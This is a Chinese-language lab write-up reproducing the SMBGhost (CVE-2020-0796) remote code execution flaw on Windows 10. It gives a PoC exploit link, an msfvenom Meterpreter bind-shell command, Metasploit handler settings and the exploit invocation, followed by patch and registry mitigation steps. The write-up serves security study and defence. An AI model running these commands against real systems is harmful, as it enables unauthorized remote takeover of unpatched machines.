CVE-2020-0796：微軟 SMBv3 協議RCE復現

CVE-2020-0796：微軟 SMBv3 協議RCE復現

原創 Loading [Timeline Sec](javascript:void(0)😉 昨天

點擊上方藍色字體關注我們，一起學安全！

本文作者：Loading（團隊復現組成員）

本文字數：940

閱讀時長：3~4min

聲明：請勿用作違法用途，否則後果自負

0x01 簡介

SMB(全稱是Server Message Block)是一個協議名，它能被用於Web連接和客戶端與服務器之間的信息溝通。

0x02 漏洞概述

**(CVE-2020-0796 SMBGhost)**該漏洞是由於SMBv3協議在處理惡意的壓縮數據包時出錯所造成的，它可讓遠程且未經身份驗證的攻擊者在目標系統上執行任意代碼。該漏洞的後果十分接近永恆之藍系列，都利用Windows SMB漏洞遠程攻擊獲取系統最高權限，WannaCry勒索蠕蟲就是利用永恆之藍系列漏洞攻擊工具製造的大災難。

0x03 影響版本

• 適用於32位系統的Windows 10版本1903
• Windows 10 1903版（用於基於x64的系統）
• Windows 10 1903版（用於基於ARM64的系統）
• Windows Server 1903版（服務器核心安裝）
• 適用於32位系統的Windows 10版本1909
• Windows 10版本1909（用於基於x64的系統）
• Windows 10 1909版（用於基於ARM64的系統）
• Windows Server版本1909（服務器核心安裝）

0x04 環境搭建

Kali虛擬機以及windows10虛擬機

可在虛擬機中搭建win10系統來進行復現。迅雷鏈接：

ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|/

0x05 漏****洞復現

EXP地址：

https://github.com/chompie1337/SMBGhost_RCE_PoC

該exp使用環境爲python3

下載完成後將該exp放到Kali虛擬機中

啓動msf，使用msf生成shellcode

命令爲：

msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt

執行該命令後會在桌面生成一個shellcode.txt，將生成的shellcode替換exp中的exploit.py中的USER_PAYLOAD保存即可。

使用Kali中的msf開啓監聽

msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp   #設置反彈模式msf5 exploit(multi/handler) > set rhost 192.168.1.103  #設置目標靶機IP地址msf5 exploit(multi/handler) > set lport 3333    #設置監聽端口msf5 exploit(multi/handler) > exploit

在Kali中進入exp文件夾，執行exp文件

python3 exploit.py ­-ip 192.168.31.137

即可看到msf中收到了回顯成功連接

如復現沒有成功可能的原因有：

1.msf監聽端口被佔用

2.windows10設置自動更新已自動打補丁

3.shellcode未替換正確

4.exp端口和msf監聽端口不一致

0x06 修復方式

目前廠商已發佈升級補丁以修復漏洞，補丁獲取鏈接：

https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-0796

或者你可以使用以下PowerShell命令禁用SMBv3服務的壓縮（無需重新啓動）：

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 –Force

此外你還可以通過禁止SMB的流量流向外網來防禦攻擊。

參考鏈接：

https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html

https://mp.weixin.qq.com/s/Nfx_UybY0M0x3C8tKND0zQ

轉載自https://mp.weixin.qq.com/s/vM4jPmklOmFTVo3xI-0JFg